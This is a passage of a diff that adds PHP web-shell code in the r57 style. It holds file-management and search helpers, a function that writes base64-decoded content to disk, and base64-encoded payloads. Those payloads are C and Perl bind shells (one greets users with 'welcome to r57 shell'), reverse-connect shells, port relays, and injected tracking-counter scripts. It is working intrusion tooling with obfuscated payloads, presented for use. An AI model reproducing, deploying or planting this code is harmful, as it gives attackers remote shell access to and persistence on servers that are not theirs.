? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
"; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + 
function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj 
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm 
+lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW 
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv 
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl 